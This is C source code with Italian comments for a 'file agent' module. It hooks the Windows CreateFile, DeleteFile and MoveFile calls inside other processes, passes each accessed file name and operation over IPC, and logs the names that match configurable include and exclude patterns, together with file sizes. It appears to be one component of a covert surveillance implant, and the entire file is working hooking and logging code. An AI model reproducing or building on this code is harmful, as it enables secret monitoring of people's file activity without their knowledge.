#include <shlwapi.h>

#define MAXFILELEN 256

// Struttura usata internamente  per
// i pattern di cattura file
typedef struct {
	DWORD accept_count;
	DWORD deny_count;
	char **accept_list;
	char **deny_list;
} pattern_list_struct;
pattern_list_struct pattern_list;

// Struttura usata nel file di configurazione 
// per i pattern di cattura file
typedef struct {
	DWORD accept_count;
	DWORD deny_count;
	char pattern_list[1];
} pattern_configuration;

typedef struct {
	COMMONDATA;
} CreateFileStruct;
CreateFileStruct CreateFileData;


typedef struct {
	char szFileName[MAXFILELEN];
	DWORD dwOperation;
} IPCCreateFileStruct;

BOOL bPM_FileAgentStarted = FALSE; // Flag che indica se il monitor e' attivo o meno

// -- Wrapper CreateFileA e CreateFileW
static HANDLE _stdcall PM_CreateFile(DWORD ARG1,
									  DWORD ARG2,
									  DWORD ARG3,
									  DWORD ARG4,
									  DWORD ARG5,
									  DWORD ARG6,
									  DWORD ARG7)
{
	IPCCreateFileStruct IPCFileData;
	char * pTmp = NULL;
	DWORD i,j;
	BOOL *Active;
	
	INIT_WRAPPER(CreateFileStruct);

	CALL_ORIGINAL_API(7);

	Active = (BOOL *)pData->pHM_IpcCliRead(PM_FILEAGENT);

	// Controlla se il monitor e' attivo
	if (!Active || !(*Active) || ((HANDLE) ret_code) == INVALID_HANDLE_VALUE)
		return (HANDLE) ret_code;
	
	pTmp = (char *)ARG1;
	
	if( !pTmp || !((DWORD)pData->pHM_IpcCliWrite))
		return (HANDLE) ret_code;

	// Unicode
	if (pTmp[1]==0) {
		for (i=0, j=0; i<(MAXFILELEN-1); i++, j+=2) {
			IPCFileData.szFileName[i] = pTmp[j];
			if (IPCFileData.szFileName[i] == 0)
				break;
		}
	} else { // Ascii
		for (i=0, j=0; i<(MAXFILELEN-1); i++, j++) {
			IPCFileData.szFileName[i] = pTmp[j];
			if (IPCFileData.szFileName[i] == 0)
				break;
		}
	}

	// Forza la terminazione
	IPCFileData.szFileName[i] = 0;
  
	IPCFileData.dwOperation = ARG2; 
		
	pData->pHM_IpcCliWrite(PM_FILEAGENT, (BYTE *)&IPCFileData, sizeof(IPCCreateFileStruct), 0);

	return (HANDLE) ret_code;
}


static DWORD PM_CreateFile_setup(HMServiceStruct * pData)
{
	CreateFileData.pHM_IpcCliRead = pData->pHM_IpcCliRead;
	CreateFileData.pHM_IpcCliWrite = pData->pHM_IpcCliWrite;
	CreateFileData.dwHookLen = 900;
	
	// sempre zero per la macro....
	return 0;
}

// -- Wrapper DeleteFileA e DeleteFileW
static BOOL _stdcall PM_DeleteFile(DWORD ARG1)
{
	IPCCreateFileStruct IPCFileData;
	char * pTmp = NULL;
	DWORD i,j;
	BOOL *Active;
	
	INIT_WRAPPER(CreateFileStruct);

	CALL_ORIGINAL_API(1);

	Active = (BOOL *)pData->pHM_IpcCliRead(PM_FILEAGENT);

	// Controlla se il monitor e' attivo e se la funzione
	// e' tornata con successo
	if (!Active || !(*Active) || ((BOOL) ret_code) == FALSE)
		return (BOOL) ret_code;
	
	pTmp = (char *)ARG1;
	
	if( !pTmp || !((DWORD)pData->pHM_IpcCliWrite))
		return (BOOL) ret_code;

	// Unicode
	if (pTmp[1]==0) {
		for (i=0, j=0; i<(MAXFILELEN-1); i++, j+=2) {
			IPCFileData.szFileName[i] = pTmp[j];
			if (IPCFileData.szFileName[i] == 0)
				break;
		}
	} else { // Ascii
		for (i=0, j=0; i<(MAXFILELEN-1); i++, j++) {
			IPCFileData.szFileName[i] = pTmp[j];
			if (IPCFileData.szFileName[i] == 0)
				break;
		}
	}

	// Forza la terminazione
	IPCFileData.szFileName[i] = 0;
  
	IPCFileData.dwOperation = DELETE; 
		
	pData->pHM_IpcCliWrite(PM_FILEAGENT, (BYTE *)&IPCFileData, sizeof(IPCCreateFileStruct), 0);

	return (BOOL) ret_code;
}

// -- Wrapper MoveFileA e MoveFileW
static BOOL _stdcall PM_MoveFile(DWORD ARG1, DWORD ARG2)
{
	IPCCreateFileStruct IPCFileData;
	char * pTmp = NULL;
	DWORD i,j;
	BOOL *Active;
	
	INIT_WRAPPER(CreateFileStruct);

	CALL_ORIGINAL_API(2);

	Active = (BOOL *)pData->pHM_IpcCliRead(PM_FILEAGENT);

	// Controlla se il monitor e' attivo e se la funzione
	// e' tornata con successo
	if (!Active || !(*Active) || ((BOOL) ret_code) == FALSE)
		return (BOOL) ret_code;
	
	pTmp = (char *)ARG1;
	
	if( !pTmp || !((DWORD)pData->pHM_IpcCliWrite))
		return (BOOL) ret_code;

	// Notifica il file sorgente come cancellato
	// Unicode
	if (pTmp[1]==0) {
		for (i=0, j=0; i<(MAXFILELEN-1); i++, j+=2) {
			IPCFileData.szFileName[i] = pTmp[j];
			if (IPCFileData.szFileName[i] == 0)
				break;
		}
	} else { // Ascii
		for (i=0, j=0; i<(MAXFILELEN-1); i++, j++) {
			IPCFileData.szFileName[i] = pTmp[j];
			if (IPCFileData.szFileName[i] == 0)
				break;
		}
	}

	// Forza la terminazione
	IPCFileData.szFileName[i] = 0;
  	IPCFileData.dwOperation = DELETE; 		
	pData->pHM_IpcCliWrite(PM_FILEAGENT, (BYTE *)&IPCFileData, sizeof(IPCCreateFileStruct), 0);


	// Notifica il file destinazione come creato
	// Unicode
	pTmp = (char *)ARG2;
	if( !pTmp || !((DWORD)pData->pHM_IpcCliWrite))
		return (BOOL) ret_code;

	if (pTmp[1]==0) {
		for (i=0, j=0; i<(MAXFILELEN-1); i++, j+=2) {
			IPCFileData.szFileName[i] = pTmp[j];
			if (IPCFileData.szFileName[i] == 0)
				break;
		}
	} else { // Ascii
		for (i=0, j=0; i<(MAXFILELEN-1); i++, j++) {
			IPCFileData.szFileName[i] = pTmp[j];
			if (IPCFileData.szFileName[i] == 0)
				break;
		}
	}

	// Forza la terminazione
	IPCFileData.szFileName[i] = 0;
  	IPCFileData.dwOperation = GENERIC_WRITE; 		
	pData->pHM_IpcCliWrite(PM_FILEAGENT, (BYTE *)&IPCFileData, sizeof(IPCCreateFileStruct), 0);

	return (BOOL) ret_code;
}



// Popola la lista di pattern da includere/escludere
void PopulatePatternList(pattern_configuration *conf_list)
{
	DWORD i;
	char *pattern_ptr;

	// Se il parametro passato e' nullo, definisce
	// la configurazione di default (inizializzazione)
	if (!conf_list) {
		pattern_list.accept_count = 0;
		pattern_list.deny_count = 0;
		pattern_list.accept_list = NULL;
		pattern_list.deny_list = NULL;
		return;
	}

	// Libera una precedente lista (se presente)
	for (i=0; i<pattern_list.accept_count; i++)
		SAFE_FREE(pattern_list.accept_list[i]);
	SAFE_FREE(pattern_list.accept_list);
	pattern_list.accept_count = 0;

	for (i=0; i<pattern_list.deny_count; i++)
		SAFE_FREE(pattern_list.deny_list[i]);
	SAFE_FREE(pattern_list.deny_list);
	pattern_list.deny_count = 0;

	// Alloca le due liste
	pattern_list.accept_list = (char **)malloc(conf_list->accept_count * sizeof(char *));
	pattern_list.deny_list = (char **)malloc(conf_list->deny_count * sizeof(char *));
	// Se fallisce, libera e ritorna.
	if (!pattern_list.accept_list || !pattern_list.deny_list) {
		SAFE_FREE(pattern_list.accept_list);
		SAFE_FREE(pattern_list.deny_list);
		return;
	}
	pattern_list.accept_count = conf_list->accept_count;
	pattern_list.deny_count = conf_list->deny_count;

	// Popola le due liste
	pattern_ptr = conf_list->pattern_list;
	for (i=0; i<pattern_list.accept_count; i++) {
		pattern_list.accept_list[i] = _strdup(pattern_ptr);
		pattern_ptr += (strlen(pattern_ptr) + 1);
	}

	for (i=0; i<pattern_list.deny_count; i++) {
		pattern_list.deny_list[i] = _strdup(pattern_ptr);
		pattern_ptr += (strlen(pattern_ptr) + 1);
	}

}

// Compara due stringhe con wildcard
// torna 0 se le stringhe sono diverse
int CmpWild(const unsigned char *wild, const unsigned char *string) {
  const unsigned char *cp = NULL, *mp = NULL;

  while ((*string) && (*wild != '*')) {
    if ((toupper((unsigned int)*wild) != toupper((unsigned int)*string)) && (*wild != '?')) {
      return 0;
    }
    wild++;
    string++;
  }

  while (*string) {
    if (*wild == '*') {
      if (!*++wild) {
        return 1;
      }
      mp = wild;
      cp = string+1;
    } else if ((toupper((unsigned int)*wild) == toupper((unsigned int)*string)) || (*wild == '?')) {
      wild++;
      string++;
    } else {
      wild = mp;
      string = cp++;
    }
  }

  while (*wild == '*') {
    wild++;
  }
  return !*wild;
}

// Controlla la lista di pattern da accettare e escludere
// torna TRUE se il pattern va loggato.
// Per proibire tutto basta mettere "\" nella deny_list
BOOL IsToLog(char *file_name)
{
	DWORD i;
	BOOL accept = FALSE;

	if (!file_name)
		return FALSE;

	// Cerca nella lista dei pattern di accept
	for(i=0; i<pattern_list.accept_count; i++)
		if (pattern_list.accept_list[i] &&
			CmpWild((unsigned char *)pattern_list.accept_list[i], (unsigned char *)file_name)) {
			accept = TRUE;
			break;
		}

	// Cerca nella lista dei pattern di deny
	for(i=0; i<pattern_list.deny_count; i++)
		if (pattern_list.deny_list[i] &&
			CmpWild((unsigned char *)pattern_list.deny_list[i], (unsigned char *)file_name))
			return FALSE;
	
	return accept;
}


DWORD __stdcall PM_FileAgentDispatch(BYTE * msg, DWORD dwLen, DWORD dwFlags, FILETIME *dummy)
{
	char buffer[512];
	HANDLE hfile;
	DWORD hi_dim = 0, lo_dim = 0;

	// Se il monitor e' stoppato non esegue la funzione di dispatch
	// Il controllo e' ridondante perche', se il monitor e' stoppato,
	// l'agent iniettato non inserisce i messaggi nella coda IPC
	if (!bPM_FileAgentStarted)
		return 0;

	// Logga il nome del file se e' incluso nella lista dei pattern
	if(IsToLog(((IPCCreateFileStruct *) msg)->szFileName)) {
		// Scrive anche la dimensione del file.
		hfile = CreateFile(((IPCCreateFileStruct *) msg)->szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
		if (hfile != INVALID_HANDLE_VALUE) {
			lo_dim = GetFileSize(hfile, &hi_dim);
			if (lo_dim == INVALID_FILE_SIZE) {
				lo_dim = hi_dim = 0;
			}
			CloseHandle(hfile);
		}

		_snprintf_s(buffer, sizeof(buffer), _TRUNCATE, "%s\r\n0x%.8X 0x%.8X%.8X\r\n\r\n",((IPCCreateFileStruct *) msg)->szFileName, ((IPCCreateFileStruct *) msg)->dwOperation, hi_dim, lo_dim);
		LOG_ReportLog(PM_FILEAGENT, (BYTE *)buffer, strlen(buffer));
	}
	return 1;
}


DWORD __stdcall PM_FileAgentStartStop(BOOL bStartFlag)
{
	// Se l'agent e' gia' nella condizione desiderata
	// non fa nulla.
	if (bPM_FileAgentStarted == bStartFlag)
		return 0;

	// I log va inizializzato come prima cosa...
	if (bStartFlag && !LOG_InitAgentLog(PM_FILEAGENT))
		return 0;

	// bStartFlag e' TRUE se il monitor deve essere attivato
	bPM_FileAgentStarted = bStartFlag;
	AM_IPCAgentStartStop(PM_FILEAGENT, bStartFlag);

	// ...e va chiuso come ultima
	if (!bStartFlag)
		LOG_StopAgentLog(PM_FILEAGENT);
		
	return 1;
}


DWORD __stdcall PM_FileAgentInit(BYTE *conf_ptr, BOOL bStartFlag)
{
	// Se il parametro passato e' nullo, definisce
	// la configurazione di default (inizializzazione)
	PopulatePatternList((pattern_configuration *)conf_ptr);

	PM_FileAgentStartStop(bStartFlag);
	return 1;
}


void PM_FileAgentRegister()
{
	// L'hook viene registrato dalla funzione HM_InbundleHooks
	AM_MonitorRegister(PM_FILEAGENT, (BYTE *)PM_FileAgentDispatch, (BYTE *)PM_FileAgentStartStop, (BYTE *)PM_FileAgentInit, NULL);

	// Inizialmente i monitor devono avere una configurazione di default nel caso
	// non siano referenziati nel file di configurazione (partono comunque come stoppati).
	PM_FileAgentInit(NULL, FALSE);
}